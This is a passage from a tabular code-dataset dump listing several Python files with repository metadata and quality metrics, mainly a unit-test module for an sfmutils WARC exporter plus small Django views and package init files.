hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d6f52b668b979413c926812e48930807d0176fd3 | 30 | py | Python | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | print('explorer-bot firmware') | 30 | 30 | 0.8 | 4 | 30 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 30 | 1 | 30 | 30 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ba33653bdde0e0da69dbb095b95d3abe31c1ee09 | 105 | py | Python | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | 1 | 2015-01-18T23:59:57.000Z | 2015-01-18T23:59:57.000Z | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | null | null | null | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, division, print_function
from .core import compute, compute_one
| 26.25 | 64 | 0.847619 | 14 | 105 | 5.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 105 | 3 | 65 | 35 | 0.88172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
ba52008c4d4f4dfe7c434dfb04f94e9a4c5d919c | 21,412 | py | Python | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 2 | 2016-05-08T06:44:13.000Z | 2016-05-16T15:07:22.000Z | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 13 | 2015-12-02T22:00:22.000Z | 2021-10-29T21:01:01.000Z | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 4 | 2020-05-27T05:05:05.000Z | 2021-02-12T22:28:47.000Z | import tests
import os
import tempfile
import shutil
import json
from mock import MagicMock, patch, Mock, PropertyMock
import iso8601
from sfmutils.exporter import BaseTable, BaseExporter, CODE_WARC_MISSING, CODE_NO_WARCS, CODE_BAD_REQUEST
from sfmutils.api_client import ApiClient
from sfmutils.warc_iter import IterItem
from sfmutils.utils import datetime_now
from kombu import Producer, Connection, Exchange
class TestExporter(tests.TestCase):
def setUp(self):
self.warc_base_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "warcs")
self.warcs = [{"warc_id": "9dc0b9c3a93a49eb8f713330b43f954c",
"path": "test_1-20151202200525007-00000-30033-GLSS-F0G5RP-8000.warc.gz",
"sha1": "000ffb3371eadb507d77d181ca3f0c5d3c74a2fc", "bytes": 460518,
"date_created": "2016-02-22T14:49:07Z"},
{"warc_id": "d3f524b52de0495b9abbf3b36b1fb06f",
"path": "test_1-20151202190229530-00000-29525-GLSS-F0G5RP-8000.warc.gz",
"sha1": "28076c245bc23d5e18e8531c19700dec869e2f9a",
"bytes": 58048,
"date_created": "2016-02-22T14:37:26Z"}]
self.warc_filepaths = [
os.path.join(self.warc_base_path, "test_1-20151202200525007-00000-30033-GLSS-F0G5RP-8000.warc.gz"),
os.path.join(self.warc_base_path, "test_1-20151202190229530-00000-29525-GLSS-F0G5RP-8000.warc.gz")]
self.export_path = tempfile.mkdtemp()
self.working_path = tempfile.mkdtemp()
def tearDown(self):
if os.path.exists(self.export_path):
shutil.rmtree(self.export_path)
if os.path.exists(self.working_path):
shutil.rmtree(self.working_path)
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_collection(self, mock_producer, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
item_date_start = "2007-01-25T12:00:00Z"
item_datetime_start = iso8601.parse_date(item_date_start)
item_date_end = "2008-02-25T12:00:00Z"
item_datetime_end = iso8601.parse_date(item_date_end)
harvest_date_start = "2007-03-25T12:00:00Z"
harvest_date_end = "2008-04-25T12:00:00Z"
export_message = {
"id": "test1",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "csv",
"segment_size": None,
"path": self.export_path,
"dedupe": True,
"item_date_start": item_date_start,
"item_date_end": item_date_end,
"harvest_date_start": harvest_date_start,
"harvest_date_end": harvest_date_end,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_start=harvest_date_start,
harvest_date_end=harvest_date_end)
mock_table_cls.assert_called_once_with(self.warc_filepaths, True, item_datetime_start,
item_datetime_end, [], None)
self.assertTrue(exporter.result.success)
csv_filepath = os.path.join(self.export_path, "test1_001.csv")
self.assertTrue(os.path.exists(csv_filepath))
with open(csv_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(3, len(lines))
name, _, kwargs = mock_producer.mock_calls[1]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("running", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertEqual("test1", export_status_message["id"])
self.assertEqual("Base Exporter", export_status_message["service"])
self.assertEqual("testhost", export_status_message["host"])
self.assertTrue(export_status_message["instance"])
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed success", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertTrue(iso8601.parse_date(export_status_message["date_ended"]))
self.assertEqual("test1", export_status_message["id"])
self.assertEqual("Base Exporter", export_status_message["service"])
self.assertEqual("testhost", export_status_message["host"])
self.assertTrue(export_status_message["instance"])
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_dehydrate(self, mock_producer, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_table.id_field.return_value = "key2"
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
export_message = {
"id": "test1",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "dehydrate",
"segment_size": None,
"path": self.export_path,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_end=None, harvest_date_start=None)
mock_table_cls.assert_called_once_with(self.warc_filepaths, False, None, None, [], None)
self.assertTrue(exporter.result.success)
txt_filepath = os.path.join(self.export_path, "test1_001.txt")
self.assertTrue(os.path.exists(txt_filepath))
with open(txt_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(2, len(lines))
self.assertEqual("k2v1\n", lines[0])
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed success", export_status_message["status"])
self.assertEqual("test1", export_status_message["id"])
@patch("sfmutils.exporter.ApiClient", autospec=True)
def test_export_seeds(self, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
export_message = {
"id": "test2",
"type": "test_user",
"seeds": [
{
"id": "005b131f5f854402afa2b08a4b7ba960",
"uid": "uid1"
},
{
"id": "105b131f5f854402afa2b08a4b7ba960",
"uid": "uid2"
},
],
"format": "csv",
"segment_size": None,
"path": self.export_path,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id=None,
seed_ids=["005b131f5f854402afa2b08a4b7ba960",
"105b131f5f854402afa2b08a4b7ba960"],
harvest_date_start=None, harvest_date_end=None)
mock_table_cls.assert_called_once_with(self.warc_filepaths, False, None, None, ["uid1", "uid2"], None)
self.assertTrue(exporter.result.success)
csv_filepath = os.path.join(self.export_path, "test2_001.csv")
self.assertTrue(os.path.exists(csv_filepath))
with open(csv_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(3, len(lines))
@patch("sfmutils.exporter.ApiClient", autospec=True)
def test_export_collection_missing_warc(self, mock_api_client_cls):
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
export_message = {
"id": "test3",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"seeds": [
{
"id": "005b131f5f854402afa2b08a4b7ba960",
"uid": "uid1"
}
],
"format": "csv",
"segment_size": None,
"path": self.export_path
}
exporter = BaseExporter("http://test", None, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
self.assertFalse(exporter.result.success)
self.assertEqual(CODE_BAD_REQUEST, exporter.result.errors[0].code)
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_collection_and_seeds(self, mock_producer, mock_api_client_cls):
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
warcs = [{"warc_id": "9dc0b9c3a93a49eb8f713330b43f954c",
"path": "xtest_1-20151202165907873-00000-306-60892de9dfc6-8001.warc.gz",
"sha1": "000ffb3371eadb507d77d181ca3f0c5d3c74a2fc", "bytes": 460518,
"date_created": "2016-02-22T14:49:07Z"}]
mock_api_client.warcs.side_effect = [warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
export_message = {
"id": "test2",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "csv",
"segment_size": None,
"path": self.export_path
}
exporter = BaseExporter("http://test", None, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_end=None, harvest_date_start=None)
self.assertFalse(exporter.result.success)
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed failure", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertTrue(iso8601.parse_date(export_status_message["date_ended"]))
self.assertEqual("test2", export_status_message["id"])
self.assertTrue(CODE_WARC_MISSING, export_status_message["errors"][0]["code"])
self.assertTrue(CODE_NO_WARCS, export_status_message["errors"][0]["code"])
def test_export_full_json(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"})]
export_filepath = os.path.join(self.export_path, "test")
now = datetime_now()
limit_uids = [11, 14]
exporter = BaseExporter(None, mock_warc_iter_cls, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter._full_json_export(self.warcs, export_filepath, True, now, None, limit_uids, None)
mock_warc_iter_cls.assert_called_once_with(self.warcs, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_start=now, item_date_end=None,
limit_item_types=None)
file_path = export_filepath + '_001.json'
self.assertTrue(os.path.exists(file_path))
with open(file_path, "r") as f:
lines = f.readlines()
self.assertEqual(2, len(lines))
self.assertDictEqual({"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}, json.loads(lines[0]))
def test_export_full_json_segment(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"}),
IterItem(None, None, None, None, {"key1": "k1v3", "key2": "k2v3", "key3": "k3v3"}),
IterItem(None, None, None, None, {"key1": "k1v4", "key2": "k2v4", "key3": "k3v4"}),
IterItem(None, None, None, None, {"key1": "k1v5", "key2": "k2v5", "key3": "k3v5"}),
IterItem(None, None, None, None, {"key1": "k1v6", "key2": "k2v6", "key3": "k3v6"}),
IterItem(None, None, None, None, {"key1": "k1v7", "key2": "k2v7", "key3": "k3v7"})]
export_filepath = os.path.join(self.export_path, "test")
now = datetime_now()
limit_uids = [11, 14]
exporter = BaseExporter(None, mock_warc_iter_cls, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter._full_json_export(self.warcs, export_filepath, True, now, None, limit_uids, 3)
mock_warc_iter_cls.assert_called_once_with(self.warcs, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_start=now, item_date_end=None,
limit_item_types=None)
        # files test_001.json, test_002.json, test_003.json (names use zfill(3))
for idx in range(3):
file_path = export_filepath + '_' + str(idx + 1).zfill(3) + '.json'
self.assertTrue(os.path.exists(file_path))
with open(file_path, "r") as f:
lines = f.readlines()
            # test_003.json only has 1 row (7 items, segment size 3)
if idx == 2:
self.assertEqual(1, len(lines))
else:
self.assertEqual(3, len(lines))
self.assertDictEqual(
{"key1": "k1v" + str(1 + idx * 3), "key2": "k2v" + str(1 + idx * 3), "key3": "k3v" + str(1 + idx * 3)},
json.loads(lines[0]))
class TestableTable(BaseTable):
def _header_row(self):
return "key1", "key2", "key3"
def _row(self, item):
return item["key1"], item["key2"], item["key3"]
class TestBaseTable(tests.TestCase):
def setUp(self):
self.warc_paths = ("/collection_set1/warc1.warc.gz", "/collection_set1/warc2.warc.gz")
def test_table(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"}),
IterItem(None, None, None, None, {"key1": "k1v3", "key2": "k2v3", "key3": "k3v3"}),
IterItem(None, None, None, None, {"key1": "k1v4", "key2": "k2v4", "key3": "k3v4"}),
IterItem(None, None, None, None, {"key1": "k1v5", "key2": "k2v5", "key3": "k3v5"}),
IterItem(None, None, None, None, {"key1": "k1v6", "key2": "k2v6", "key3": "k3v6"}),
IterItem(None, None, None, None, {"key1": "k1v7", "key2": "k2v7", "key3": "k3v7"})]
now = datetime_now()
limit_uids = [11, 14]
tables = TestableTable(self.warc_paths, True, now, None, limit_uids, mock_warc_iter_cls, segment_row_size=2)
chunk_cnt = 0
for idx, table in enumerate(tables):
chunk_cnt += 1
for count, row in enumerate(table):
# every chunk should start with header row
if count == 0:
# Header row
# Just testing first and last, figuring these might change often.
self.assertEqual("key1", row[0])
self.assertEqual("key2", row[1])
self.assertEqual("key3", row[2])
# chunk 1 and row 2
if idx == 0 and count == 1:
# First row
self.assertEqual("k1v1", row[0])
self.assertEqual("k2v1", row[1])
self.assertEqual("k3v1", row[2])
# chunk 3 and row 3
if idx == 2 and count == 2:
self.assertEqual("k1v6", row[0])
self.assertEqual("k2v6", row[1])
self.assertEqual("k3v6", row[2])
# chunk 4 and row 2
if idx == 3 and count == 1:
self.assertEqual("k1v7", row[0])
self.assertEqual("k2v7", row[1])
self.assertEqual("k3v7", row[2])
self.assertEqual(4, chunk_cnt)
mock_warc_iter_cls.assert_called_with(self.warc_paths, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_end=None, item_date_start=now,
limit_item_types=None)
| 46.853392 | 119 | 0.609425 | 2,407 | 21,412 | 5.1371 | 0.105941 | 0.03429 | 0.034695 | 0.021836 | 0.810028 | 0.759402 | 0.730044 | 0.716539 | 0.715245 | 0.698504 | 0 | 0.065586 | 0.267981 | 21,412 | 456 | 120 | 46.95614 | 0.7233 | 0.014384 | 0 | 0.621333 | 0 | 0 | 0.156702 | 0.070694 | 0 | 0 | 0 | 0 | 0.202667 | 1 | 0.034667 | false | 0 | 0.032 | 0.005333 | 0.08 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bae765f8927f71cad24e0c3ae4637bf3dadb7cb2 | 394 | py | Python | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def home(request):
return render(request, 'index.html', {})
def calendar(request):
return render(request, 'calendar.html', {})
def contact(request):
return render(request, 'contact.html', {})
def eboard(request):
return render(request, 'eboard.html', {})
def speaker_series(request):
return render(request, 'speaker_series.html', {}) | 24.625 | 53 | 0.69797 | 47 | 394 | 5.808511 | 0.340426 | 0.238095 | 0.347985 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147208 | 394 | 16 | 53 | 24.625 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0.164557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
245a3029f68fdc792b9c3070faa273fe2f0ec3ea | 135 | py | Python | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | null | null | null | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | 9 | 2020-10-07T16:02:17.000Z | 2020-11-16T13:10:40.000Z | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | 1 | 2022-02-14T02:33:45.000Z | 2022-02-14T02:33:45.000Z | from .notebookfilefinder import NotebookFileFinder
from .notebookvariableextractor import NotebookVariableExtractor
from .task import * | 45 | 64 | 0.888889 | 11 | 135 | 10.909091 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081481 | 135 | 3 | 65 | 45 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2460c221873dad1a9a606192d8d3ac65a3604bfa | 25 | py | Python | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | 2 | 2020-04-05T07:13:16.000Z | 2020-04-05T18:18:54.000Z | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | 21 | 2020-04-01T02:34:02.000Z | 2022-03-26T18:51:46.000Z | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | null | null | null | from .model import model
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2460e2878eb4ff7352a1f67475fa5b1d6c3c0d03 | 3,071 | py | Python | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
] | null | null | null | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
